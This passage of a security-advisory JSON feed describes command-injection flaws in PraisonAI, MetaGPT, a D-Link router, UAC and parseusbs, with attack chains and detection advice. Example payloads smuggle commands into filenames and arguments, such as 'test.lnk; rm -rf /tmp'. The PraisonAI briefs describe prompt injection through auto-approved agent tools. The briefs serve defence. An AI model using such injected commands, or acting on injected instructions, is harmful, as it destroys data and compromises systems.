delete data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAdministrator control undermined:\u003c/strong\u003e The hardcoded \u003ccode\u003eapproval_mode\u003c/code\u003e silently overrides administrator-configured settings, creating a false sense of security.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrompt injection vector:\u003c/strong\u003e Malicious content could trigger command execution through auto-approved tools without direct user intent, especially through external sources like web searches or uploaded files.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe vulnerable versions are PraisonAI versions prior to 4.5.128.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eUpgrade PraisonAI:\u003c/strong\u003e Upgrade to version 4.5.128 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eApply Code-Level Fix:\u003c/strong\u003e If upgrading is not immediately feasible, manually remove the hardcoded override in \u003ccode\u003echat.py\u003c/code\u003e and \u003ccode\u003ecode.py\u003c/code\u003e as described in the advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImplement Allowlisting:\u003c/strong\u003e Strengthen command sanitization by implementing an allowlist approach instead of a blocklist in the \u003ccode\u003e_sanitize_command()\u003c/code\u003e function as described in the advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMonitor Process Creation:\u003c/strong\u003e Deploy the Sigma rule \u0026ldquo;Detect Suspicious PraisonAI Command Execution\u0026rdquo; to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMonitor Network Connections:\u003c/strong\u003e Deploy the Sigma rule \u0026ldquo;Detect Suspicious Outbound Connection from PraisonAI\u0026rdquo; to identify potential data exfiltration attempts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview Authentication:\u003c/strong\u003e Ensure strong passwords are in use and consider multi-factor authentication to mitigate risks from compromised credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T19:25:49Z","date_published":"2026-04-10T19:25:49Z","id":"/briefs/2024-01-09-praisonai-rce/","summary":"A vulnerability in PraisonAI allows authenticated users to execute arbitrary shell commands due to a hardcoded approval setting in the Chainlit UI modules, overriding administrator configurations and bypassing intended approval gates; insufficient command sanitization allows for destructive command execution, leading to confidentiality breach, integrity compromise, and availability impact on the server.","title":"PraisonAI UI Hardcoded Approval Mode Leads to Remote Code Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-09-praisonai-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5974"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","metagpt","cve-2026-5974"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical command injection vulnerability, tracked as CVE-2026-5974, has been identified in FoundationAgents MetaGPT up to version 0.8.1. The vulnerability resides within the \u003ccode\u003eBash.run\u003c/code\u003e function located in the \u003ccode\u003emetagpt/tools/libs/terminal.py\u003c/code\u003e library. An attacker can exploit this flaw by injecting malicious commands into the \u003ccode\u003eBash.run\u003c/code\u003e function, leading to arbitrary OS command execution on the target system. The vulnerability is remotely exploitable, posing a significant risk. Although the developers were notified via a pull request, no patch has been released as of the publication of this brief. This vulnerability could be exploited to gain unauthorized access, escalate privileges, or compromise the entire system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a MetaGPT instance running version 0.8.1 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious input string containing OS commands.\u003c/li\u003e\n\u003cli\u003eThis malicious string is passed to the \u003ccode\u003eBash.run\u003c/code\u003e function in \u003ccode\u003emetagpt/tools/libs/terminal.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to insufficient input validation, the injected commands are not properly neutralized.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eBash.run\u003c/code\u003e function executes the injected OS commands using the underlying operating system\u0026rsquo;s shell.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to execute arbitrary code on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker could then install malware, create new user accounts, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary operating system commands on the server hosting the vulnerable MetaGPT instance. This could lead to complete system compromise, including data theft, malware installation, and denial-of-service attacks. Due to the nature of command injection, the impact is highly dependent on the privileges of the user account running the MetaGPT application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply input validation and sanitization to the \u003ccode\u003eBash.run\u003c/code\u003e function in the \u003ccode\u003emetagpt/tools/libs/terminal.py\u003c/code\u003e library to prevent command injection (CVE-2026-5974).\u003c/li\u003e\n\u003cli\u003eMonitor process creations for unusual commands executed by the MetaGPT application (see Sigma rule \u0026ldquo;Detect Suspicious MetaGPT Bash.run Execution\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eDeploy a web application firewall (WAF) to filter out potentially malicious payloads being sent to the MetaGPT application.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T20:16:29Z","date_published":"2026-04-09T20:16:29Z","id":"/briefs/2026-04-metagpt-cmd-injection/","summary":"A command injection vulnerability exists in FoundationAgents MetaGPT version 0.8.1 affecting the Bash.run function, enabling remote attackers to execute arbitrary OS commands via crafted input.","title":"MetaGPT Bash.run Command Injection Vulnerability (CVE-2026-5974)","url":"https://feed.craftedsignal.io/briefs/2026-04-metagpt-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5972"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["CVE-2026-5972","command-injection","metagpt"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5972 describes a critical OS command injection vulnerability affecting FoundationAgents MetaGPT versions up to 0.8.1. The vulnerability resides in the \u003ccode\u003eTerminal.run_command\u003c/code\u003e function within the \u003ccode\u003emetagpt/tools/libs/terminal.py\u003c/code\u003e file. This flaw allows remote attackers to inject and execute arbitrary operating system commands on the affected system. The vulnerability is remotely exploitable, meaning that attackers can trigger it over a network without requiring local access. Public exploits for this vulnerability are available, increasing the risk of widespread exploitation. The patch identified as \u003ccode\u003ed04ffc8dc67903e8b327f78ec121df5e190ffc7b\u003c/code\u003e addresses this vulnerability and upgrading to a patched version is highly recommended.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable MetaGPT instance running a version \u0026lt;= 0.8.1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request targeting the \u003ccode\u003eTerminal.run_command\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe malicious request contains an OS command injection payload within the input parameters expected by \u003ccode\u003eTerminal.run_command\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMetaGPT processes the request, passing the attacker-controlled input to the underlying operating system\u0026rsquo;s command interpreter without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe operating system executes the injected command as part of the MetaGPT process, granting the attacker code execution within the server environment.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial foothold to escalate privileges, potentially gaining root access or compromising other services on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker may then install malware, establish persistence, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, which could include data theft, denial of service, or complete system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, malware installation, and denial of service. Given the publicly available exploit, unpatched MetaGPT instances are at immediate risk. The vulnerability has a CVSS v3.1 score of 7.3, indicating a high level of severity. The number of victims and sectors targeted is currently unknown, but given the nature of the vulnerability, any organization using MetaGPT is potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch \u003ccode\u003ed04ffc8dc67903e8b327f78ec121df5e190ffc7b\u003c/code\u003e provided by FoundationAgents to remediate the vulnerability.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the MetaGPT application, specifically those containing command injection attempts (cs-uri-query, cs-method, sc-status).\u003c/li\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect command execution originating from the MetaGPT application (logsource).\u003c/li\u003e\n\u003cli\u003eReview network traffic for unusual outbound connections originating from MetaGPT servers, which could indicate successful exploitation and malware installation (category: network_connection).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on MetaGPT servers to identify any unexpected child processes spawned by the MetaGPT application, as this could indicate command injection exploitation (category: process_creation).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T20:16:28Z","date_published":"2026-04-09T20:16:28Z","id":"/briefs/2026-04-metagpt-command-injection/","summary":"A remote command injection vulnerability exists in FoundationAgents MetaGPT \u003c= 0.8.1 via the Terminal.run_command function, allowing unauthenticated attackers to execute arbitrary OS commands.","title":"MetaGPT OS Command Injection Vulnerability (CVE-2026-5972)","url":"https://feed.craftedsignal.io/briefs/2026-04-metagpt-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.6,"id":"CVE-2026-40088"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-40088","command-injection","praisonai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI, a multi-agent teams system, is susceptible to OS command injection in versions prior to 4.5.121. The vulnerability, identified as CVE-2026-40088, stems from the \u003ccode\u003eexecute_command\u003c/code\u003e function and workflow shell execution, which improperly handles user-controlled input. Attackers can inject arbitrary shell commands through shell metacharacters via agent workflows, YAML definitions, and LLM-generated tool calls. This can lead to complete system compromise. It is critical to upgrade to version 4.5.121 or later to remediate this vulnerability. The CVSS v3.1 base score for this vulnerability is 9.6, indicating a critical severity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious YAML definition or workflow for PraisonAI.\u003c/li\u003e\n\u003cli\u003eThis crafted input contains shell metacharacters designed to inject arbitrary commands.\u003c/li\u003e\n\u003cli\u003eThe user (victim) imports or executes the attacker-supplied YAML or workflow within PraisonAI.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eexecute_command\u003c/code\u003e function processes the input without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected shell commands are executed by the underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution privileges on the PraisonAI server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform lateral movement, data exfiltration, or system compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker can further leverage the compromised system to target other systems within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40088 allows an attacker to execute arbitrary commands on the PraisonAI server. This can lead to complete system compromise, data exfiltration, and potential lateral movement within the network. The severity of this vulnerability is rated as critical with a CVSS v3.1 score of 9.6. This could affect any organization using PraisonAI versions prior to 4.5.121.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade PraisonAI to version 4.5.121 or later to patch CVE-2026-40088.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied data processed by the \u003ccode\u003eexecute_command\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eMonitor PraisonAI logs for suspicious command execution patterns after upgrading.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eReview and restrict permissions of the PraisonAI service account to minimize the impact of successful command injection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T20:16:27Z","date_published":"2026-04-09T20:16:27Z","id":"/briefs/2026-04-praisonai-command-injection/","summary":"PraisonAI versions prior to 4.5.121 are vulnerable to OS command injection, allowing attackers to execute arbitrary shell commands via user-controlled input in agent workflows, YAML definitions, and LLM-generated tool calls.","title":"PraisonAI OS Command Injection Vulnerability (CVE-2026-40088)","url":"https://feed.craftedsignal.io/briefs/2026-04-praisonai-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5844"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","d-link","router","cve-2026-5844"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5844 describes a critical command injection vulnerability affecting D-Link DIR-882 routers running firmware version 1.01B02. The vulnerability resides in the \u003ccode\u003esprintf\u003c/code\u003e function within the \u003ccode\u003eprog.cgi\u003c/code\u003e script, specifically within the HNAP1 SetNetworkSettings Handler. A remote, unauthenticated attacker can exploit this flaw by manipulating the \u003ccode\u003eIPAddress\u003c/code\u003e argument, injecting arbitrary OS commands that are then executed with elevated privileges. The vulnerability is considered critical due to the potential for complete system compromise and the availability of a public exploit. This vulnerability impacts products that are no longer supported by the maintainer, increasing the risk for users who have not migrated to newer devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-882 router running firmware version 1.01B02.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003eprog.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the HNAP1 SetNetworkSettings Handler.\u003c/li\u003e\n\u003cli\u003eThe attacker manipulates the \u003ccode\u003eIPAddress\u003c/code\u003e argument within the HTTP request, injecting malicious OS commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esprintf\u003c/code\u003e function in \u003ccode\u003eprog.cgi\u003c/code\u003e processes the attacker-controlled \u003ccode\u003eIPAddress\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed on the router\u0026rsquo;s operating system due to the command injection vulnerability in \u003ccode\u003esprintf\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as modifying router settings, eavesdropping on network traffic, or using the router as a botnet node.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5844 allows a remote attacker to execute arbitrary OS commands on the vulnerable D-Link DIR-882 router. This can lead to a complete compromise of the device, enabling attackers to reconfigure the router, intercept network traffic, or use the compromised device as part of a botnet. The vulnerability affects end-of-life products, meaning no official patches are available. The impact is significant due to the widespread use of these routers in home and small business networks, where they can act as a gateway to internal systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect D-Link DIR-882 Command Injection Attempt\u003c/code\u003e to detect suspicious requests to \u003ccode\u003eprog.cgi\u003c/code\u003e containing shell metacharacters.\u003c/li\u003e\n\u003cli\u003eBlock access to the URL \u003ccode\u003ehttps://files.catbox.moe/ei31k1.zip\u003c/code\u003e to prevent the download of the publicly available exploit (IOC).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP requests to \u003ccode\u003eprog.cgi\u003c/code\u003e with unusually long \u003ccode\u003eIPAddress\u003c/code\u003e parameters (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) rules to identify and block exploit attempts targeting CVE-2026-5844 (log source: network_connection).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T05:16:06Z","date_published":"2026-04-09T05:16:06Z","id":"/briefs/2026-04-dlink-command-injection/","summary":"A command injection vulnerability (CVE-2026-5844) exists in the D-Link DIR-882 router version 1.01B02, allowing a remote attacker to execute arbitrary OS commands by manipulating the IPAddress argument in the HNAP1 SetNetworkSettings Handler via the prog.cgi script.","title":"D-Link DIR-882 Remote Command Injection Vulnerability (CVE-2026-5844)","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-40032"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","uac"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eUAC (Unix-like Artifacts Collector) before version 3.3.0-rc1 is susceptible to a command injection vulnerability. This flaw resides in the placeholder substitution and command execution pipeline within the application. Specifically, the \u003ccode\u003e_run_command()\u003c/code\u003e function directly passes constructed command strings to \u003ccode\u003eeval\u003c/code\u003e without proper sanitization. This lack of input validation allows attackers to inject malicious shell metacharacters or command substitutions into the command strings. Exploitation is possible through attacker-controlled inputs such as \u003ccode\u003e%line%\u003c/code\u003e values from \u003ccode\u003eforeach\u003c/code\u003e iterators and \u003ccode\u003e%user%\u003c/code\u003e / \u003ccode\u003e%user_home%\u003c/code\u003e values derived from system files. Successful exploitation leads to arbitrary command execution with the same privileges as the UAC process. This poses a significant risk to system integrity and confidentiality.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable UAC instance running a version prior to 3.3.0-rc1.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious input string containing shell metacharacters or command substitutions, targeting either \u003ccode\u003e%line%\u003c/code\u003e values in \u003ccode\u003eforeach\u003c/code\u003e iterators, or the \u003ccode\u003e%user%\u003c/code\u003e and \u003ccode\u003e%user_home%\u003c/code\u003e values.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled input is passed to UAC, potentially via a configuration file, command-line argument, or other input mechanism.\u003c/li\u003e\n\u003cli\u003eUAC\u0026rsquo;s \u003ccode\u003e_run_command()\u003c/code\u003e function receives the malicious input and performs placeholder substitution.\u003c/li\u003e\n\u003cli\u003eThe resulting command string, now containing the injected commands, is passed to the \u003ccode\u003eeval\u003c/code\u003e function without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eeval\u003c/code\u003e function executes the attacker-injected commands with the privileges of the UAC process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as data exfiltration, system compromise, or lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe command injection vulnerability in UAC before 3.3.0-rc1 allows attackers to execute arbitrary commands on the affected system. The impact of successful exploitation includes complete system compromise, data breaches, and potential for lateral movement to other systems within the network. Since UAC is used to collect artifacts, successful exploitation could lead to the collection of sensitive data from the compromised system, which could then be exfiltrated. The specific number of potential victims is unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade UAC to version 3.3.0-rc1 or later to patch CVE-2026-40032.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied input, particularly those used in command construction and execution, to prevent command injection vulnerabilities.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for unexpected or unauthorized commands originating from the UAC process, using the Sigma rules provided below.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T22:16:23Z","date_published":"2026-04-08T22:16:23Z","id":"/briefs/2024-01-uac-command-injection/","summary":"UAC before 3.3.0-rc1 is vulnerable to command injection in the _run_command() function, allowing attackers to execute arbitrary commands with the privileges of the UAC process through manipulated input values.","title":"UAC (Unix-like Artifacts Collector) Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-uac-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-40029"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command injection","lnk","parseusbs","cve-2026-40029"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eparseusbs before version 1.9 is susceptible to an OS command injection vulnerability (CVE-2026-40029) within the \u003ccode\u003eparseUSBs.py\u003c/code\u003e script. This flaw arises from the program\u0026rsquo;s failure to sanitize LNK file paths before passing them to the \u003ccode\u003eos.popen()\u003c/code\u003e function. This allows an attacker to craft malicious .lnk filenames containing shell metacharacters. When \u003ccode\u003eparseusbs\u003c/code\u003e processes a USB drive containing such a file, the specially crafted filename is interpreted as a command, leading to arbitrary command execution on the system of the forensic examiner using the tool. The vulnerable versions of parseusbs are used by security professionals for USB forensic analysis, making successful exploitation dangerous for those running the tool.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious .lnk file. The filename includes shell metacharacters designed to execute arbitrary commands. For example, a filename could be \u003ccode\u003etest.lnk; rm -rf /tmp\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker places the crafted .lnk file onto a USB drive.\u003c/li\u003e\n\u003cli\u003eA forensic examiner uses parseusbs (version before 1.9) to analyze the USB drive.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eparseUSBs.py\u003c/code\u003e script processes the files on the USB drive, including the malicious .lnk file.\u003c/li\u003e\n\u003cli\u003eThe script extracts the .lnk file path without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe unsanitized .lnk file path is passed to the \u003ccode\u003eos.popen()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eos.popen()\u003c/code\u003e function interprets the shell metacharacters in the filename, executing the attacker\u0026rsquo;s injected command.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary code execution on the examiner\u0026rsquo;s system, allowing them to potentially compromise the system, steal sensitive data, or further pivot into the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the system of a forensic examiner using \u003ccode\u003eparseusbs\u003c/code\u003e. This could lead to complete system compromise, data exfiltration, or further malicious activities. Given that \u003ccode\u003eparseusbs\u003c/code\u003e is a tool used by security professionals, a successful attack could have significant consequences, potentially exposing sensitive forensic data. The impact is particularly severe as the examiner likely has access to sensitive information related to their investigations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade \u003ccode\u003eparseusbs\u003c/code\u003e to version 1.9 or later to remediate CVE-2026-40029.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unexpected processes spawned by Python (\u003ccode\u003epython.exe\u003c/code\u003e or \u003ccode\u003epython3\u003c/code\u003e). Use the Sigma rule \u0026ldquo;Detect Suspicious Process Creation by Python\u0026rdquo; to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring for LNK files, particularly those found on USB drives. The Sigma rule \u0026ldquo;Detect Creation of LNK Files in Removable Media\u0026rdquo; can help identify suspicious LNK file creation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T22:16:23Z","date_published":"2026-04-08T22:16:23Z","id":"/briefs/2026-04-parseusbs-cmd-injection/","summary":"parseusbs before 1.9 is vulnerable to OS command injection in parseUSBs.py due to unsanitized LNK file paths passed to os.popen(), allowing arbitrary command execution via crafted .lnk filenames.","title":"parseusbs Unsanitized LNK File Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-parseusbs-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-40030"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eparseusbs before version 1.9 is susceptible to an OS command injection vulnerability, identified as CVE-2026-40030. This flaw arises from the application\u0026rsquo;s failure to sanitize the volume listing path argument (-v flag) before passing it to the \u003ccode\u003eos.popen()\u003c/code\u003e function in Python. This function executes shell commands, and in this case, uses \u003ccode\u003els\u003c/code\u003e to list volume contents. By crafting a malicious volume path containing shell metacharacters, an attacker can inject arbitrary commands that will be executed with the privileges of the parseusbs process. This vulnerability was reported by VulnCheck and patched in subsequent versions. Successful exploitation requires the attacker to control the \u003ccode\u003e-v\u003c/code\u003e flag\u0026rsquo;s value, typically through command-line arguments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable parseusbs instance running a version prior to 1.9.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious volume path argument containing shell metacharacters (e.g., \u003ccode\u003e;/\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker executes parseusbs with the \u003ccode\u003e-v\u003c/code\u003e flag, supplying the crafted volume path as the argument.  Example: \u003ccode\u003eparseusbs -v \u0026quot;; command\u0026quot;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eparseusbs passes the unsanitized volume path argument to the \u003ccode\u003eos.popen()\u003c/code\u003e function along with the \u003ccode\u003els\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eos.popen()\u003c/code\u003e function executes the combined command within a shell, injecting the attacker\u0026rsquo;s commands.\u003c/li\u003e\n\u003cli\u003eThe injected commands are executed with the privileges of the parseusbs process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary command execution, potentially leading to system compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence, lateral movement, or data exfiltration depending on the injected commands.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40030 allows an attacker to execute arbitrary commands on the system where parseusbs is running. This can lead to a full system compromise, including data theft, modification, or destruction. Given a CVSS v3.1 score of 7.8, this vulnerability is considered high severity. While specific victim counts and sectors are unknown, any system running a vulnerable version of parseusbs is at risk, particularly if the application processes user-supplied volume paths.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade parseusbs to version 1.9 or later to remediate CVE-2026-40030 (Reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Parseusbs Command Line Arguments\u003c/code\u003e to identify potential exploitation attempts (Reference: Rules).\u003c/li\u003e\n\u003cli\u003eMonitor command-line arguments passed to parseusbs for shell metacharacters (e.g., \u003ccode\u003e;/|\u0026amp;\u003c/code\u003e) (Reference: Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T22:16:23Z","date_published":"2026-04-08T22:16:23Z","id":"/briefs/2026-04-parseusbs-command-injection/","summary":"parseusbs before 1.9 is vulnerable to OS command injection (CVE-2026-40030) due to improper sanitization of the volume listing path argument, potentially allowing arbitrary command execution via crafted volume paths.","title":"parseusbs OS Command Injection Vulnerability (CVE-2026-40030)","url":"https://feed.craftedsignal.io/briefs/2026-04-parseusbs-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","praisonai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI versions prior to 4.5.121 are susceptible to OS command injection. The vulnerability stems from the application\u0026rsquo;s use of \u003ccode\u003esubprocess.run()\u003c/code\u003e with the \u003ccode\u003eshell=True\u003c/code\u003e parameter when executing commands derived from various user-controlled inputs. These inputs include YAML workflow definitions, agent configuration files (agents.yaml), LLM-generated tool call parameters, and recipe step configurations. This configuration allows an attacker to inject arbitrary shell commands through shell metacharacters, leading to potential remote code execution and system compromise. This vulnerability is particularly concerning in automated environments like CI/CD pipelines or agent workflows, where unintended command execution can occur without direct user awareness.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious YAML workflow definition or modifies an existing one, injecting shell metacharacters into the \u003ccode\u003etarget\u003c/code\u003e field of a \u003ccode\u003eshell\u003c/code\u003e step.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker modifies the \u003ccode\u003eagents.yaml\u003c/code\u003e file, injecting malicious commands into the \u003ccode\u003eshell_command\u003c/code\u003e field of an agent task.\u003c/li\u003e\n\u003cli\u003eThe attacker triggers the execution of the crafted YAML workflow or loads the modified \u003ccode\u003eagents.yaml\u003c/code\u003e file using PraisonAI\u0026rsquo;s command-line interface.\u003c/li\u003e\n\u003cli\u003ePraisonAI parses the YAML file and extracts the attacker-controlled command string.\u003c/li\u003e\n\u003cli\u003eThe application then passes this command string to \u003ccode\u003esubprocess.run()\u003c/code\u003e with 